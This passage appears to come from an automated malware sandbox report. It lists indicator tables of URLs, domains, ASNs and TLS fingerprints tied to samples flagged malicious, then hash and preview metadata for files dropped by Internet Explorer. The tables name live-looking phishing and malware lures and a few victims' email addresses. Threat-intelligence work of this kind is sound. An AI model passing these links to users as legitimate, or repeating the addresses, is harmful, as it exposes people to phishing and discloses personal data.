	http://t.eservices-laposte.fr/TrackActions/NzA0YmE3MTRiOTg4NGEyM2E4Njc4ZDIyNGVjNmJmMTYzMDQxMzhmZTVjNzEyMDU2OTMxM2JkODcxMDUzMmYxY2ZlZWFjODU5ZDUyYzM3MGQxNzM2YTU1NjRlOTA0YWUzZmY4Mjc4MDQ2YWMzY2ZkZDA5MWQ0MWE0OWJmODc4NWM2ZDA2YWI4MmJmYmRkNGNjZTQyNmRlZjRkNjMyM2NmNTUyM2FlZDI5NmVjM2UzMmUyZThhMjEwMzk0MzYxMzI1MmExZjBiMmU5ZWNjMDg0OTY3YTZhYWZkOTMzMGQxZWI0YjBkZmM1MjBkNzQyM2QzMTY4MjgyOTJjM2QwZGUxZmVkZTU1MjhiZTE5YjdhY2MwNTQ0ZjdkMGJmODNjNzYwODY2ODY5M2RhZjgwMjAzMzcxNzM5MjBjM2QxOTI0MzQ5ODhhMGNlNWYwNjlmZGY5YjcwNDQ0ZGQ4MjM3ZGM0Njk4M2U0MWRjYjE0ZTRiNDk3NWM1MDAyYjYxZGIzMGI2NzllMjg4ZTYxNjhlZWViYzM1ZDcwNDJhYjg4NjhlNTA5NjAyZTc3MTJkODExM2NhZGRiYTYwM2Y3NDRmNmY5MDY5MTU0N2I3NGE1MzhiMzA5OGFhYmVjZjJkN2VhNDQzMjljNzM5MWU1ODM1ZDg1YzViYjVmODMzZGNmYWRmODc3MGM3MTZkZGU2ZjFkYWU4NTNlNGQ0OTFkYTM5ZmQzOA	Get hash	malicious	Browse	yui.yahooapis.com/3.4.1/build/yui/yui-min.js
	http://www.knappassociatesinc.com	Get hash	malicious	Browse	www.flickr.com/photos/knappassociatesinc/
	https://skphysiotherapy.ca/FEDWIRE/	Get hash	malicious	Browse	cookiex.ngd.yahoo.com/ack?xid=E0&eid=XjSTxQAAAemDVVL0
	Doc.htm	Get hash	malicious	Browse	l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	dVcML4Zl0J.dll	Get hash	malicious	Browse	23.54.113.52
	0pz1on1.dll	Get hash	malicious	Browse	23.54.113.52
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse	2.18.68.31
	sentinel.dll	Get hash	malicious	Browse	104.84.56.24
	fasm.dll	Get hash	malicious	Browse	104.84.56.24
	1.dll	Get hash	malicious	Browse	92.122.146.68
	https://beachrentalgroup.com/sgtitle/Doc.htm	Get hash	malicious	Browse	2.18.68.31
	74b8bbe22ee44997019c42ec4060592d.dll	Get hash	malicious	Browse	2.18.68.31
	960.dll	Get hash	malicious	Browse	104.84.56.24
	opzi0n1.dll	Get hash	malicious	Browse	92.122.146.68
	opzi0n1.dll	Get hash	malicious	Browse	92.122.146.68
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	2.20.86.97
	SecuriteInfo.com.Variant.Mikey.116755.11070.dll	Get hash	malicious	Browse	104.84.56.24
	fasm.dll	Get hash	malicious	Browse	23.210.250.97
	http://technoraga.com/Doc.htm	Get hash	malicious	Browse	23.210.250.97
	http://tinyurl.com	Get hash	malicious	Browse	2.18.68.31
	http://www.f-nm948948gh.highsierratri.org/-.php//aHVnb0Bkc2ktcGJsLmNvbQ==#aHR0cDovL3p2ZDRha2V3OS5mYXN0ZXN0Y2RuLm5ldC9NbzE2L01hbC9JSy9vZjEvaHVnb0Bkc2ktcGJsLmNvbQ==	Get hash	malicious	Browse	2.18.68.31
	fasm.dll	Get hash	malicious	Browse	104.84.56.24
	dss.dll	Get hash	malicious	Browse	104.84.56.24
	fasm.dll	Get hash	malicious	Browse	104.84.56.24
tls13.taboola.map.fastly.net	dVcML4Zl0J.dll	Get hash	malicious	Browse	151.101.1.44
	0pz1on1.dll	Get hash	malicious	Browse	151.101.1.44
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse	151.101.1.44
	sentinel.dll	Get hash	malicious	Browse	151.101.1.44
	fasm.dll	Get hash	malicious	Browse	151.101.1.44
	1.dll	Get hash	malicious	Browse	151.101.1.44
	74b8bbe22ee44997019c42ec4060592d.dll	Get hash	malicious	Browse	151.101.1.44
	opzi0n1.dll	Get hash	malicious	Browse	151.101.1.44
	opzi0n1.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Mikey.116755.11070.dll	Get hash	malicious	Browse	151.101.1.44
	fasm.dll	Get hash	malicious	Browse	151.101.1.44
	https://www.women.com/alexa/quiz-dialect-test	Get hash	malicious	Browse	151.101.1.44
	fasm.dll	Get hash	malicious	Browse	151.101.1.44
	dss.dll	Get hash	malicious	Browse	151.101.1.44
	fasm.dll	Get hash	malicious	Browse	151.101.1.44
	pDkFPnlBaF.dll	Get hash	malicious	Browse	151.101.1.44
	2G8SpzHSZS.dll	Get hash	malicious	Browse	151.101.1.44
	hW7FMNpCD8.dll	Get hash	malicious	Browse	151.101.1.44
	tiu0FJJLOP.dll	Get hash	malicious	Browse	151.101.1.44
	Xe2iOoKw4y.dll	Get hash	malicious	Browse	151.101.1.44
ocsp.sca1b.amazontrust.com	0pz1on1.dll	Get hash	malicious	Browse	54.230.104.94
	opzi0n1.dll	Get hash	malicious	Browse	13.224.89.175
	H5MmXCKkB1.exe	Get hash	malicious	Browse	65.9.23.43
	new-awsd.exe	Get hash	malicious	Browse	13.224.89.194
	CAISSON64.EXE	Get hash	malicious	Browse	13.224.89.175
	Scan_Image_from_IMANAGE_MALTA.pdf	Get hash	malicious	Browse	13.32.182.145
	http://civiljour.tk	Get hash	malicious	Browse	13.32.177.52
	http://partypoker.com	Get hash	malicious	Browse	143.204.10.85
	NEURILINK DOCUMENT. 20062018.pdf	Get hash	malicious	Browse	13.32.177.193
	June 2018 LE Newsletter - Customer.pdf	Get hash	malicious	Browse	13.32.177.194
	http://msofte.xyz	Get hash	malicious	Browse	52.85.69.88
	http://www.djyokoo.com	Get hash	malicious	Browse	54.230.14.183
	http://photobucket.com/user/nikkireed11/library	Get hash	malicious	Browse	52.85.177.12
	Nts293901920190123.exe	Get hash	malicious	Browse	13.32.210.149
	https://na01.safelinks.protection.outlook.com/?url=http%3A%2F%2Fhbmonte.com%2Fups.com%2FWebTracking%2FDB-9080473587665%2F&data=02%7C01%7Cgtwilliams%40mercuryinsurance.com%7C545ee765273f439bfe4a08d5bf1a5960%7C0d8ef88be7e14f18b332ab564f6cda49%7C0%7C0%7C636625042252813480&sdata=CmjWmdDSndkUJNDHRF8U%2BNA3VlA9Sa%2BhAiYJSbxLNfY%3D&reserved=0	Get hash	malicious	Browse	52.85.245.41
	http://sellmyhousefl.net/wp-content/plugins/loavescy.html	Get hash	malicious	Browse	13.32.16.140
	http://email.lyftmail.com/c/eJwtkE1vgkAQhn8N3iDLsi5w4ACl2hqjsSaiXsiyO8o07EL4EO2vLzRN5jLJM-_MMyoSoXJhUb1ufa6h68QdclQRYVT5VHHbJa6wGQCxQ1rcbF8EoVAFdYPAW2BEiRuQJQkoYd6SOa7D3tNVzAlJg9TnPAktRuZoLbByZK0XZQQBDakMVSEplx5l3PNdqRjzfe5KEHJRRWXfN53lxRZdTTWOozNnzPNTWwwdmulQu2nrG1YwgStZK7C8NHttvsXHppHeV3M9LsutSWqRPTtxTn4O61V_PZfmYg7DhYb9J454yU5MrneP4rhRTqr2Cu8OGI18n11jZrJ6W-_KePN2ojkkobQoH3qdd_XQynkdmgf2oKa36QLavAWNRkH7j0mhG4F3M4ECns0s30aybLHrERzhNCVWFU6ejAgNz3vxJ_gLZsmCsQ	Get hash	malicious	Browse	54.192.185.212
	http://click.forescout.com/u/c0800IQW0TpU0jwRO0jQb00	Get hash	malicious	Browse	13.33.23.161
	https://ironoil.com/pop/	Get hash	malicious	Browse	52.85.88.97
	http://212.174.225.94	Get hash	malicious	Browse	52.84.235.137

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YAHOO-DEBDE	dVcML4Zl0J.dll	Get hash	malicious	Browse	87.248.118.22
	http://us.i1.yimg.com	Get hash	malicious	Browse	87.248.118.22
	https://beachrentalgroup.com/sgtitle/Doc.htm	Get hash	malicious	Browse	87.248.118.22
	opzi0n1.dll	Get hash	malicious	Browse	87.248.118.22
	opzi0n1.dll	Get hash	malicious	Browse	87.248.118.22
	http://f.zgbmw.com.cn	Get hash	malicious	Browse	87.248.118.23
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	87.248.118.22
	https://www.women.com/alexa/quiz-dialect-test	Get hash	malicious	Browse	87.248.118.23
	http://technoraga.com/Doc.htm	Get hash	malicious	Browse	87.248.118.23
	dss.dll	Get hash	malicious	Browse	87.248.118.23
	fasm.dll	Get hash	malicious	Browse	87.248.118.23
	pDkFPnlBaF.dll	Get hash	malicious	Browse	87.248.118.23
	hW7FMNpCD8.dll	Get hash	malicious	Browse	87.248.118.23
	Xe2iOoKw4y.dll	Get hash	malicious	Browse	87.248.118.23
	FqzagMI8Bf.dll	Get hash	malicious	Browse	87.248.118.23
	https://mmemicrosoftwebsss.typeform.com/to/sIZVMxGk	Get hash	malicious	Browse	87.248.118.23
	https://synchron.co.ke/Doc.htm	Get hash	malicious	Browse	87.248.118.23
	Fm1tbGISzO.dll	Get hash	malicious	Browse	87.248.118.22
	https://alpacashare.org/Doc.htm	Get hash	malicious	Browse	87.248.118.23
	xg.dll	Get hash	malicious	Browse	87.248.118.22
AMAZON-02US	SWIFT_HSBC Bank.exe	Get hash	malicious	Browse	3.13.31.214
	Order Specification Requirement With Ref. AMABINIF38535.exe	Get hash	malicious	Browse	52.58.78.16
	RB1NsQ9LQf.exe	Get hash	malicious	Browse	108.154.107.74
	0pz1on1.dll	Get hash	malicious	Browse	54.230.104.94
	http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples	Get hash	malicious	Browse	54.230.104.18
	https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1	Get hash	malicious	Browse	52.216.10.91
	https://olhonabrasa.com.br/secure/zimbra/access/zimbra/index.php	Get hash	malicious	Browse	13.224.93.31
	https://lfonoumkgl.zizera.com/FX	Get hash	malicious	Browse	13.224.93.109
	ACH WlRE PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	13.224.93.46
	ACH WlRE PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	13.224.93.45
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse	18.200.151.216
	https://view.publitas.com/ipinsurance/demers-beaulne-inc/	Get hash	malicious	Browse	75.2.88.188
	ACH - WlRE PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	13.224.93.115
	ACH - WlRE PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	54.186.140.208
	https://app.box.com/s/frm9cufh9ljwjmsdcrv6gioilzlttstr	Get hash	malicious	Browse	15.237.76.117
	https://app.box.com/s/nhail927gb4xe0vkdigl8n7u4jallbvw	Get hash	malicious	Browse	35.181.18.61
	PURCHASE ORDER 998S.html	Get hash	malicious	Browse	13.224.93.47
	ACHWlRE REMlTTANCE ADVlCE..xlsx	Get hash	malicious	Browse	13.224.93.45
	ACHWlRE REMlTTANCE ADVlCE..xlsx	Get hash	malicious	Browse	54.70.105.250
	https://app.box.com/s/mw9txrhu7ouy0j4fp4pfpo0pb1fepx7g	Get hash	malicious	Browse	34.252.156.174

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	dVcML4Zl0J.dll	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	0pz1on1.dll	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	Https://christinescom.github.io/cappdevs/ta.html?bbre=dsiw4risd	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	#Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htm	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://olhonabrasa.com.br/secure/zimbra/access/zimbra/index.php	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://lfonoumkgl.zizera.com/FX	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	ACH WlRE PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://view.publitas.com/ipinsurance/demers-beaulne-inc/	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	ACH - WlRE PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://app.box.com/s/frm9cufh9ljwjmsdcrv6gioilzlttstr	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://app.box.com/s/nhail927gb4xe0vkdigl8n7u4jallbvw	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://t.co/DmCKxDTz1S	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	http://customer.cartech.com/inventory_manufacturing.cfm	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://storage.googleapis.com/0293dgcvyj3883besd873by83g2b/index.html#	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	ACHWlRE REMlTTANCE ADVlCE..xlsx	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://app.box.com/s/mw9txrhu7ouy0j4fp4pfpo0pb1fepx7g	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://meet.google.com/linkredirect?authuser=1&dest=https://stockrnantitle.com/word/5TB4-JEJV3O-DVG0/#ajE0MzQ4d0Bsdm1wZC5jb20=	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44
	https://www.canva.com/design/DAEN4Gk1aAs/uErgK6sn3gPozGMXWtYgqA/view?utm_content=DAEN4Gk1aAs&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	87.248.118.22 151.101.2.132 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3040
Entropy (8bit):	4.931835057215713
Encrypted:	false
SSDEEP:	48:L3mai3mai3maZmai3mai3mai3maiBmaiBmaiBmaiBmahmaiBmaiImaiImaiImai8:LZCZCZZZCZCZCZkZkZkZkZhZkZVZVZVz
MD5:	92AC622E384ECB4894F353A62B1DEC4B
SHA1:	BE147005C0A694C0DB17AB058248377EF6829738
SHA-256:	B955CDADC1E7576C0938C37C1A3579F3F573236FE11632BD6B6349196CA2A62F
SHA-512:	7E7622D491DE1946CA4EA62950ABF03830ECC72836499B21723F53381375B58A12BEAB24D9BE0B0D6970B27517353C8AC0DA7398393F5FAEADFC17C1B2F6E069
Malicious:	false
Reputation:	low
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="336762544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336762544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336762544" htime="30850711" /><item name="mntest" value="mntest" ltime="336842544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336762544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336762544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336762544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336962544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336962544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336962544" htime="30850711" /></root><root><item name="HBCM_BIDS" value="{}" ltime="336962544" htime="30850711" /><item name="mntest" value="mntest" ltime="340362544" htime="30850711" /></root><ro

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4D2E24F3-2A8A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	67304
Entropy (8bit):	2.1150557963717684
Encrypted:	false
SSDEEP:	192:rnZ0ZKk2ix9WTetxfOtZrWTzdIW/WTYGWTIER/XxrKLleR/Fs:rZEwiUaBu8TzJOTmTIEtXVKLleRa
MD5:	74F3859A7AACF3CD024B1C0046A8C9C2
SHA1:	A14A4EDEFD1F5583A44022ACA3CC14D4F368A2B0
SHA-256:	3429A3734EF14F1FACB84F674E9299DA4611ECE423E5CC99DCE6C5B899E42FD3
SHA-512:	30BA9A852429D406718206FDF755CB8C9080F9500F347227998B9A2946E22942F76F2E9DB9E2EF60D45041768603604D9E67F6CE87F51493B0B1463B057C98C9
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	191326
Entropy (8bit):	3.6086162459414473
Encrypted:	false
SSDEEP:	3072:CZiqZ/2Bfc6ru5rXfVStpxiqZ/2BfcJru5rXfVStf:Brgi
MD5:	21766463F9CE3170372463A6D2A03700
SHA1:	72E12A6B0CC70F452AC3EF4C1FD3E6CCF97A5FC1
SHA-256:	797E893A16E4B8AD2D6CE16557B54E21B0A7CFA75A324B7625237334E9BC8D3B
SHA-512:	DE8055EBD618AD8C4F3DEBBB25AC3E6E27A4C622A3252891616C48977CF0640D26CA4924022B4A8170E9DF02C185C5E3DECF8666B311DF16E55955771F8CFC1C
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4D2E24F7-2A8A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27304
Entropy (8bit):	1.8252167503568384
Encrypted:	false
SSDEEP:	96:rgZE7QL6pBSMFj02WkW3AM2YiLsVxLsW2iA:rgZE7QL6pkMFj02WkWQM2YiAxuiA
MD5:	A44C57839B6CCC81BA8451BD74158921
SHA1:	F061B85A23F39726A6EBD5983E2B8F44A24748F5
SHA-256:	100890A2FE93D5072A92FC382BF21A647F43E3B8BD934CF362C6C87C8ABDF7CA
SHA-512:	E4DC5A8016719214DAC478055983F18BF065FCCA2AE77F1B14A81EA62F4B899603DAB348BBE171EEEF20F5C3056CE47F404A60FEB3B91306402DBB1F3274117B
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6731429B-2A8A-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.600384371756794
Encrypted:	false
SSDEEP:	48:Iw2hGcprM6GwpafG4pQzjGrapbSftrGQpB5QGHHpcrtsTGUpQJSWGcpm:raZZQx6rBSftFjZ2rtk6pg
MD5:	97BFC4B175215F97AE33595CB8094AA6
SHA1:	ED5ED045DC740EC233D41A5694C4703433B4DCAD
SHA-256:	84D48D0687BE1D978C8AAC78BD298143F164C07F7745606C3F650ACDC5F56148
SHA-512:	6CF137CFF3A73358E99BC564C1E6597F3DAEA6110B2BB0BF490AD64FA63958D82FB552A14A32D8C3902BD4C5349FFF3E8B9F6388934CEF279E27D6E962F2C828
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.033140339184817
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGva:u6tWu/6symC+PTCq5TcBUX4bo
MD5:	9D025C18BEFA4C3F54699769984B83C9
SHA1:	9C83AF9C90BF2B1D2B2AF95D5C9AFF2CDEB0710C
SHA-256:	8D25CB19008B1D78C35C2D7875F1F6FD14AE47C4B98FB9622CB0ECA981362175
SHA-512:	76B7466637BC40DADCBBC7E6391A36354397F8E30F0F1522A7A6BB0BE40BE26451DE52AB60CD9B43017A604F6106326B0CDC2DF6C609496B7333B232A8E9081E
Malicious:	false
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........X.._....X.._....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\3[1].avi Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	downloaded
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:3:3
MD5:	5BFA51F3A417B98E7443ECA90FC94703
SHA1:	8C015D80B8A23F780BDD215DC842B0F5551F63BD
SHA-256:	BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
SHA-512:	4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
Malicious:	false
IE Cache URL:	http://ocsp.sca1b.amazontrust.com/images/ImwSfQzek0TH1PjPRN/U0Aq1rFKx/emeJW4LJI8wrM6MN4_2B/qJPnb8B3BkpX2XpdE2G/V316Jgdov_2BOgw86dBUYu/kkLtVneyvgFhX/UiMN5NKO/xM6hmwPnY5DiFEO8xhkgOsY/OSDkw0Qs/kJpX3kaA4Hvk7/3.avi
Preview:	0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AACl6Lf[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	684
Entropy (8bit):	7.548210116658932
Encrypted:	false
SSDEEP:	12:6v/78/flSvl0FxzEeS8GoatUUy0pLCOqwzAQpw1tGrqoxPZ7p2P08XnQeis/McK:YmEPoaOUy0BCFwUEMsnxPdA9pEH
MD5:	EED7513A78C7B2E3A6FAE97E1864AE8B
SHA1:	5A448EB4A8A9BDE216B5B2A6FEA2B320CE2CE010
SHA-256:	07C2DFABF1783AA3AB630DD6B54D7C9C70E03677847C06E1B94314109B84E2E6
SHA-512:	13148F57963C9295EBA2AE5583327DD677EA46B35BAA7B7B14B98ACC1ED875FAB755F45298618A712619B6253B60D540D33FD52B5F9E0153E8D7BCA2D82CC88B
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AACl6Lf.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.........]......AIDAT8O...KSa..?.9...M.6g.F....~C.BXt._PP.?.].FY.U]E...A..&.. (+M..e........l.`....^..y...>..y.G.........V1....7v)0.<f#.).b...#.l.:.Q.(r.K....#..$...N...-....TG..j.....v../..A...F!m.L..).`...w.,V8.;3.W5.....c>=Eu...Y..;..Y.\F.K..g.K..u..h....l^.....NAk...+L....oRT,...T..........<.......VB......]E.....aT.>Q.!x..fe....A...z}K:..".P.t.......VlX...N.W\k.y#.e..qB7'd..,.....%!...J...^.....G.Fq.{#...}.X.........iLN.{......pg_..z.K...5...A8..$p....`.+..J...."..X..r..B:..5....ty.u...K.2..'.+DaY.&t......G..=....,......"....[........v.4..#.....n....mT..j&9......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAuTnto[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	801
Entropy (8bit):	7.591962750491311
Encrypted:	false
SSDEEP:	24:U/6yrupdmd6hHb/XvxQfxnSc9gjo2EX9TM0H:U/6yruzFDX6oDBY+m
MD5:	BB8DFFDE8ED5C13A132E4BD04827F90B
SHA1:	F86D85A9866664FC1B355F2EC5D6FCB54404663A
SHA-256:	D2AAD0826D78F031D528725FDFC71C1DBAA21B7E3CCEEAA4E7EEFA7AA0A04B26
SHA-512:	7F2836EA8699B4AFC267E85A5889FB449B4C629979807F8CBAD0DDED7413D4CD1DBD3F31D972609C6CF7F74AF86A8F8DDFE10A6C4C1B1054222250597930555F
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAuTnto.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O].[H.a...s..k.x..$....L...A.(T.Y....S$T....E.J.EO.(=..RB^..{..4..M...^f/3.o..?,..\|...9.s>...E.]rhj2.4....G.T"..!r.Th.....B..s.o.!...S...bT.81.y.Y....o...O.?.Z..v..........#h;.E........)p.<.....'.7.{.;.....p8...:.. ).O..c!.........5...KS..1....08..T..K..WB.Ww.V....=.)A.....sZ..m..e..NYW...E... Z].8Vt...ed.m..u......\|@...W...X.d...DR..........007J.q..T.V./..2&Wgq..pB..D....+...N.@e.......i..:.L...%....K..d..R..........N.V........$.......7..3.....a..3.1...T.`.]...T{.......).....Q7JUUlD....Y....$czVZ.H..SW$.C......a...^T......C..(.;]\|,.2..;.......p..#.e..7....<..Q...}..G.WL,v.eR...Y..y.`>.R.L..6hm.&,...5....u..[$_.t1.f...p..( .."Fw.I...'.....%4M..._....[.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB17milU[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	627
Entropy (8bit):	7.4822519699232695
Encrypted:	false
SSDEEP:	12:6v/78/W/6TiIP7X0TFI8uqNN9pEsGCLDOk32Se5R2bBCEYPk79kje77N:U/6xPT0TtNNDGCLDOMVe5JEAkv3N
